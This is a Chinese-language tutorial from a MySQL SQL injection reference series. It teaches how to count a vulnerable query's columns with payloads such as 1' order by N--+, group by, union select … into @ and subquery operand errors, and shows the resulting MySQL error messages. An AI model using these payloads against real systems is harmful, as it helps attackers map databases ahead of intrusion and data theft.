sql注入知识库－mysql篇(3)

上接sql注入知识库－mysql篇(2)

表和字段

一、检测字段数量

order by／group by

group by / order by +1 ;

备注：

order by 和 group by 都是用来根据字段排序用的

保持数字持续增加，直到得到一个错误响应

尽管group by 和 order by 在sql中是不同的功能，他们都可以用完全相同的方式确认查询的列数

examples：

Given the query SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';

1’ order by 1--+ true

还原一下 select username，password，permission from users where id = '1' order by 1 --+

从users表查询id ＝ 1 的username , password permission 然后通过第一个字段（username）按照升序排列

1’ order by 2--+ true

。。。。

1’ order by 4--+ false 说明该表总共有3列

1' union select 1,2,3 true

基于错误1

group by 或 order by 1,2,3,4,5 ......

类似上面提到的方法，我们可以通过一个请求查看显错模式是否启动来判断字段数量

examples:

select * from student where id = 1 order by 1,2,3 ; true

select * from student where id = 1 order by 1,2,3,4 ; true

select * from student where id = 1 order by 1,2,3,4,5 ; 返回 ERROR 1054 (42S22): Unknown column '5' in 'order clause'

说明该表字段只有4列

select * from student where id = 1 group by 1,2,3,4,5 ; 返回 ERROR 1054 (42S22): Unknown column '5' in 'group statement'

说明该表字段只有4列

基于错误2

select ... into var_list , var_list1 , var_list2 ....

1. 如果显错模式开启，这个方法可以正常工作

2. 是一个实用的用于查找字段数量的方法，当注入点后面存在一个limit子句的时候。

examples:

Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

-1 union select 1 into @,@,@ The used SELECT statements have a different number of columns

-1 union select 1 into @ 如果不报错说明查询的信息使用了一个

mysql> select name,id1 from student limit 1,1 into @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select name,id1 from student limit 1,1 into @,@;
Query OK, 1 row affected (0.00 sec)

字段

实例

mysql> select name from student where id = -1 union select 1 into @; 可以看到该查询使用了name一个字段，所以后面用select 1 into @就不会报错
Query OK, 1 row affected (0.00 sec)

mysql> select name,id1 from student where id = -1 union select 1,2 into @,@; 这里使用了name和id1两个字段，所以后面相应的要使用1，2 into @,@ 不会报错
Query OK, 1 row affected (0.00 sec)

examples:

Given the query SELECT username, permission FROM Users limit 1,{INJECTION POINT};

1 into @,@,@ 报错 The used SELECT statements have a different number of columns

1 into @,@ 无报错说明查询的字段有2个

实例：

select name,id1 from student limit 1,1 into @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
select name,id1 from student limit 1,1 into @,@;
Query OK, 1 row affected (0.00 sec)

limit用法：

limit 开始位置，取几条

select name,id from student limit 0,1; 从student表中取出第一条数据

select name,id from student limit 1,1; 从student表中取出第二条数据

select name,id from student limit 0,3; 从student表中取出3条数据，从第一条开始取

基于错误3

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

备注：

工作在你知道表名但是没有启用错误回显的环境，它会返回字段数量

example：

Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

1 and (select * from student) = 1

实例：
select name,id from student where id = 1 and (select * from student) = 1;

ERROR 1241 (21000): Operand should contain 4 column(s)

select name,id from student where id = 1 and (select * from student) = 2;
ERROR 1241 (21000): Operand should contain 4 column(s)

sql注入知识库－mysql篇(3)

相关推荐